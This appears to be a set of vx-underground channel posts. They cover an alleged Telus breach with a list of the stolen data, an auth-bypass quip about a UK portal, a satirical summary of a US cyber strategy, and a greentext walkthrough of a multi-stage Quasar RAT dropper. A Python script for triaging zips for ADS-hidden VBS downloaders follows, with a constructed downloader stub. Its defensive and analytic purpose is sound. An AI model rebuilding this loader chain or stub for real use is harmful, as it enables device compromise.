Today BleepingComputer published a story on a company named Telus Digital being compromised by a threat group operating under the moniker "ShinyHunters", a reference to Pokémon.
GTIG (Google Threat Intelligence Group) has been tracking ShinyHunters under the label UNC6395.
UNC6395 has been targeting enterprise organizations since at least August 2025 by exploiting compromised OAuth tokens to gain access to company Salesforce instances. Upon successful compromise, UNC6395 attempts vertical or horizontal movement by combing through the compromised Salesforce data.
At a currently unknown time, UNC6395 successfully compromised Telus' Salesforce instance, which allowed them to pivot elsewhere within the organization.
The amount of data UNC6395 claims to have compromised is astronomical. They claim to have exfiltrated over ONE PETABYTE of data (compressed as .tar.xz). While Telus has confirmed the compromise, the exfiltration of ONE PETABYTE of data indicates the compromise may have occurred weeks, possibly months, ago. Telus as of this writing has not given additional details on the compromise (more on that later).
I am unable to confirm the validity of the data, primarily because I do not have the means to reliably comb through a petabyte of data. However, "snippets" and "samples" have been shared. Based on the data seen, the compromise appears authentic. Here is a high-level overview of what was allegedly compromised and successfully exfiltrated.
- Employee Full Legal Name
- Employee National ID Number and/or SSN
- Telus hashed passwords, API keys, OAuth tokens
- Call record details
- Call metadata
- Telecom customer PII (First Name, Last Name, Address)
- HR records
- Agent performance records
- Salesforce accounts, contacts, leads, and records
- Financial records (ACH routing numbers, etc)
- GitHub repository access to an additional 20 organizations adjacent to Telus (20,000 internal source code projects)
- Customer and Agent call records in .wav
- 14,139 customer database instances, all containing customer PII (unspecified)
- GLEAN TELUS background check files. UNC6395 has access to FBI, RCMP, and CISA background checks.
- GLEAN TELUS confidential reports on investigations
- GLEAN TELUS confidential reports on tax filings (?)
- ... just search "GLEAN" on Google
If what UNC6395 states is true, this breach impacts approx. 230M companies across the globe. Based on information seen publicly, ... it looks bad.
However, as of this writing, Telus has not done anything other than confirm the compromise with some journalists. I suspect they're currently performing DFIR (Digital Forensics and Incident Response) and forming a strategy to combat this technologically, legally, logistically, and PR-wise.
Is UNC6395 telling the truth? Is this compromise as severe as it appears to be? When will TELUS provide more details? Will impacted customers be notified? Is law enforcement mad their background checks are allegedly compromised?
Find out next time on Dragon Ball Z
I have been informed I misread and used the wrong UNC number. Now people are calling me a doofus and a dumb cat (I'm not a fucking cat wtf)
> be uk government
> make web portal for doing taxes
> companieshouse
> click file for different company
> enter company number
> prompt for auth
> hit back button 3 times
> authentication bypassed
> ???
> full information leaked
> can modify company details for uk gov
> ???
Today United States President Donald J. Trump released the "Cyber Strategy for America" document. It was highlighted by FBI Director Kash Patel.
Let's take a look at it together. I'll translate it from fancy political speak into nerd speak.
Intro:
>america is cool and badass
>were strong af fr
>our hackers are schizo af
>we could be strongerer
>need corpos to work with us fr
>were fuckin shit up so nerds cant hide
>america 250 years old soon
>computers are important
Section Two:
>we made the internet
>we are the best in internet stuff
>mean nerds fuck shit up on the internet
>mean nerds pissing us off
>"im trump and im not a bitch about cyber"
>mean nerds targeting important shit online
>this is a new era of cyberspace
>lots of money online
Section Three:
>mean nerds pissing us off fr
>if we cant internet you, well physically hurt you
>he actually wrote that LOL
>other countries have shitty AI
>we have the best AI
>were gonna work with unis and companies for AI
>wont let people be censored online
>something about people censoring americans
>mean nerds will get sanctioned
>mean nerds will be memed
>mean nerds will get beat up (maybe)
>america remove more regulations on AI
>regulations slow us down
>gotta go fast af boi fr
>cybersecurity so important fr
Donald J. Trump Pillars of Action:
1. Shape Adversary Behavior
>mean nerds attacking americans and companies
>theyre innocent ppl tho
>nsa and cia given thumbs up to hack back extra
>we raising aggression
2. Promote Common Sense Regulation
>reduce cybersecurity regulation
>checklists are for losers
>regulation make companies less agile
>companies and gov need to be fast af
3. Modernize and Secure Federal Government Networks
>government computers are lame
>will make them better
>use best practices
>use "post-quantum cryptography"
>use "zero-trust architecture"
>use "cloud transition"
>will improve stuff to hunt down nerds we dont like
>will use AI for cybersecurity
4. Secure Critical Infrastructure
>critical infra support important
>energy grid important af to defend
>banks important af to defend
>hospitals important af to defend
>water plants important af to defend
>telecoms important af to defend
>datacenters important af to defend
>must defend everything important af
>stop using technology made by countries we dont like
5. Sustain Superiority in Critical and Emerging Technologies
>america will make more tech stuff
>we gonna protect what we make fr
>cryptocurrency must be secured and stuff
>we need quantum stuff
>ai mega important tho
>we need more ai for hacking and for defense
>people we dont like hack dumb and shitty ai
6. Build Talent and Capacity
>we need more nerds
>nerds are unironically super important
>need to invest in nerds
>remove "roadblocks" for nerds (???) across industry
>will invest in more nerd stuff for nerds to learn
Today the Israeli government dropped flyers over the people of Lebanon.
The Lebanese government warned citizens not to scan the QR codes because they were concerned it could be a way for the Israeli government to compromise people's phones.
I said, "WHAT THE FUCK. FREE MALWARE?" I IMMEDIATELY scanned it. I didn't even hesitate.
All it did was link me to some goofy WhatsApp thingy (I don't have WhatsApp) and it linked me to something called Unit504 on Facebook.
To be fair, it is 100% possible for the Israeli government to have a WhatsApp exploit. I tested it from my computer and was disappointed.
Big shout out to my baby boy. He'll be one year old any day now.
He has unlocked a new skill.
It's opening the refrigerator and pulling things off the bottom shelf and throwing them all over the kitchen floor
Thank you, unknown person on the internet, for e-mailing from a compromised Argentine military e-mail.
I'm sure the Argentine government loves having to perform an internal incident response to discover it has been used to send some random dude on the internet pictures of cats.
vx-underground
Whenever someone sends me an e-mail from a compromised government e-mail, and I acknowledge it, people get silly and begin sending me e-mails from other compromised government e-mails. Thank you, random person, for the e-mail from a compromised Brazilian…
Yes, I know these are from stealer logs (maybe. I don't know), but sometimes it makes me giggle.
Hello,
It is time again I sync updates to malware city, the website some of you visit, and some of you don't.
Upload notes will come soon.
In the meantime, enjoy this cool clip from the latest Nicki Minaj song
Her latest songs are a little angrier and less pop since she has leaned into being a conservative. Regardless, I think it fits her well. I think it's cool she experiments with different sounds and genres.
Hello,
I pushed the malware stuff to that malware website you sometimes visit.
It is Sunday so please spend it with the most important people in your life (your anime action figures)
https://vx-underground.org/Updates
> check tele
> "smelly i think someone sent me malware"
> "they sent me weird .zip"
> "be careful"
> wtf i love malware
> download file
> look inside
> .txt + alternate data stream file
> ads doesnt work with 7z
> ok lol
> look inside
> 7z x "dox[.]zip" -so > payload.vbs
> winhttp request to github
> github\minecraftstuff\discordemojis.txt
> download discordemojis.txt
> look inside
> heavily obfuscated .bat file
> bonk with stick
> powershell script
> ???
> checks for av stuff
> does steganography
> downloads from ibb.co
> look inside
> quasar rat
> hides in made fonts directory in roaming
most work ive seen put into a malware payload in a while with 2 stages and stego, usually its FAKE_GAME_INSTALLER.JPEG.EXE
> "smelly i think someone sent me malware"
> "they sent me weird .zip"
> "be careful"
> wtf i love malware
> download file
> look inside
> .txt + alternate data stream file
> ads doesnt work with 7z
> ok lol
> look inside
> 7z x "dox[.]zip" -so > payload.vbs
> winhttp request to github
> github\minecraftstuff\discordemojis.txt
> download discordemojis.txt
> look inside
> heavily obfuscated .bat file
> bonk with stick
> powershell script
> ???
> checks for av stuff
> does steganography
> downloads from ibb.co
> look inside
> quasar rat
> hides in made fonts directory in roaming
most work ive seen put into a malware payload in awhile with 2 stages and stego, usually its FAKE_GAME_INSTALLER.JPEG.EXE
π₯°77π€£44β€8π₯8π«‘4
vx-underground
> check tele > "smelly i think someone sent me malware" > "they sent me weird .zip" > "be careful" > wtf i love malware > download file > look inside > .txt + alternate data stream file > ads doesnt work with 7z > ok lol > look inside > 7z x "dox[.]zip" -soβ¦
didn't even dawn on me this was CVE-2025-8088
- n-day
- multi-staged payload
- stego usage
- quasar???
wtf lol
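The archive trick in the greentext above (a harmless-looking .txt with the real payload sitting in an alternate data stream, pulled out with `7z x -so`) is cheap to triage before anything gets extracted. The script below is an added example, not the channel's or the sender's code: it walks every entry of a zip held in memory, flags entry names that carry an ADS suffix (`name.txt:stream`) or a `..` path component, reads the hidden entry the way `7z -so` does, and greps it for the COM ProgIDs a VBS downloader needs. The sample archive, the `dox.txt` / `payload.vbs` names, the VBS stub and its placeholder URL are constructed here for the demonstration; they are not the real sample, and nothing is downloaded or executed.

```python
"""Triage a zip for ADS-style entry names and the downloader stub hidden in them.

Added example, not the channel author's code. The archive built by
build_sample() is constructed for this demonstration only.
"""
import io
import re
import zipfile

# One path component of the form "name:stream" (NTFS alternate data stream).
# A bare drive letter such as "C:" does not match: the regex requires text on
# both sides of the colon.
ADS_RE = re.compile(r"^[^\\/:]+:[^\\/:]+$")

# COM ProgIDs a VBScript stage needs to fetch and run a next stage.
# The first one is the "winhttp request" from the post.
SUSPICIOUS_PROGIDS = (
    b"WinHttp.WinHttpRequest",
    b"MSXML2.XMLHTTP",
    b"WScript.Shell",
)


def classify_entry(name: str) -> list:
    """Return the findings for one archive entry name (empty list = nothing odd)."""
    findings = []
    parts = re.split(r"[\\/]", name)          # split on either separator
    if any(p == ".." for p in parts):
        findings.append("path-traversal")
    if any(ADS_RE.match(p) for p in parts):
        findings.append("ads-name")
    return findings


def triage_archive(data: bytes) -> dict:
    """Inspect every entry of an in-memory zip without extracting to disk.

    Returns {entry_name: {"findings": [...], "size": n, "indicators": [...]}}.
    Flagged entries are read into memory (the equivalent of `7z x -so`) and
    scanned for the ProgIDs above; clean entries are left unread.
    """
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            findings = classify_entry(info.filename)
            indicators = []
            if findings:
                body = zf.read(info)
                indicators = [p.decode() for p in SUSPICIOUS_PROGIDS if p in body]
            report[info.filename] = {
                "findings": findings,
                "size": info.file_size,
                "indicators": indicators,
            }
    return report


def hidden_entries(report: dict) -> list:
    """Names of entries an ADS-unaware tool would extract to the wrong place or skip."""
    return sorted(n for n, r in report.items() if "ads-name" in r["findings"])


def build_sample() -> bytes:
    """Constructed archive shaped like the one in the post: a visible .txt plus a
    "dox.txt:payload.vbs" entry holding a VBS stub that references WinHTTP.
    The URL is a placeholder, not the one from the real sample."""
    vbs = (
        b'Set h = CreateObject("WinHttp.WinHttpRequest.5.1")\r\n'
        b'h.Open "GET", "https://example.invalid/minecraftstuff/discordemojis.txt", False\r\n'
        b"h.Send\r\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("dox.txt", b"lol u got doxxed\r\n")
        zf.writestr("dox.txt:payload.vbs", vbs)   # the ADS entry
    return buf.getvalue()


if __name__ == "__main__":
    rep = triage_archive(build_sample())
    for name, r in rep.items():
        print(f"{name!r:30} {r['size']:6d}  {r['findings']}  {r['indicators']}")
    print("hidden:", hidden_entries(rep))
```

Python's `zipfile` never writes a stream on extraction, so `triage_archive` only reads; point it at a real sample with `triage_archive(open(path, "rb").read())` and feed anything it flags to the dynamic analysis you would do anyway. `7z l` on the same archive shows the colon in the entry name, which is the same signal this script keys on.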